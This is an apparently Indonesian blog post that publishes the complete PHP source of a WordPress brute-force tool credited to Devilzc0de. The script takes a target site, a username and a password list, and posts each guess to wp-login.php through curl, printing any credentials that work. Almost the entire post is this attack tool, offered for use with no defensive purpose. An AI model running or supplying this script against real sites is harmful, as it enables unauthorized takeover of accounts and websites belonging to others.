WP Bruteforce

inilah source code untuk WP Bruteforce

===========***********============

<html>

<head>

<title>Wordpress Brute By Poticous</title>

<style>

body{

    background:#000000;

    font-family:Tahoma,Verdana,Arial;

    color:#fff;

    font-size:12px;

}

.footer{

    text-align:right;

    padding:0 16px;

    font-size:10px;

    letter-spacing:2px;

    color:#999999;

}

.footer:hover{

    text-align:right;

    padding:0 16px;

    font-size:10px;

    letter-spacing:2px;

    color:#999999;

    text-decoration:underline;

}

.input{

    width:200px;

}

textarea.input{

    height:100px;

}

</style>

</head>

<body>

<?php

$brute = $_GET['brute'];

if($_POST){

$file = "devilzc0de.txt";

$pwd = $_POST['passwd'];

$handle = fopen($file, 'w');

fwrite($handle, "$pwd");

fclose($handle);

set_time_limit(0);

$username = $_POST['username_target'];

$dictionary ="devilzc0de.txt";

// Mencari Value Submit http://devilzc0de.org/forum/thread-10245.html

$homepage = file_get_contents($_POST["situs_target"].'/wp-login.php');

$string_awal   = '<input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="';

$string_akhir   = '" tabindex="100" />';

$homepage = explode($string_awal, $homepage);

$homepage = explode($string_akhir, $homepage[1]);

##########################################

function kontrol($utarget,$ptarget){

$useragent = "Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54";

$data = "log=$utarget&pwd=$ptarget&wp-submit=".$homepage[0]; ;

$ch = curl_init($_POST["situs_target"].'/wp-login.php');

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

curl_setopt($ch, CURLOPT_USERAGENT, $useragent);

curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');

curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');

$source=curl_exec ($ch);

curl_close ($ch);

if(eregi("WordPress</title>",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "Kamus Password Tidak Di Temukan";exit;}

$lines=file($dictionary);

echo "Attack Starting..<br>";

sleep(10);

echo "Attack Started, brute forcing..<br>";

foreach($lines as $line){

$line=str_replace("\r","",$line);

$line=str_replace("\n","",$line);

if(kontrol($username,$line)){echo "<font color=\"green\"><b>[+]</b> username : <b>$username</b> , password : <b>$line</b><br>";}

else{echo "<font color=\"red\"><b>[-]</b> username : $username , password : $line<br>";

}

}

}else{

?>

<form action="" method="post">

<p>

<label>Username<br>

<input type="text" name="username_target" class="input"></label>

</p>

<p>

<label>List Password<br>

<textarea name="passwd" class="input"></textarea></label>

</p>

<p>

<label>Situs Target<br>

<input type="text" name="situs_target"class="input"> Ex : http://localhost/wordpress/</label>

</p>

<input type="submit" value="Brute">

</form>

<?

}

?>

<p class="footer">&copy; <?php echo date('Y'); ?> Poticous - Devilzc0de</p>

</body>

</html>

============***********=============

sumber : Devilzc0de

WP Bruteforce 2012-01-18T12:11:00-08:00 Rating: 4.5 Diposkan Oleh: r007-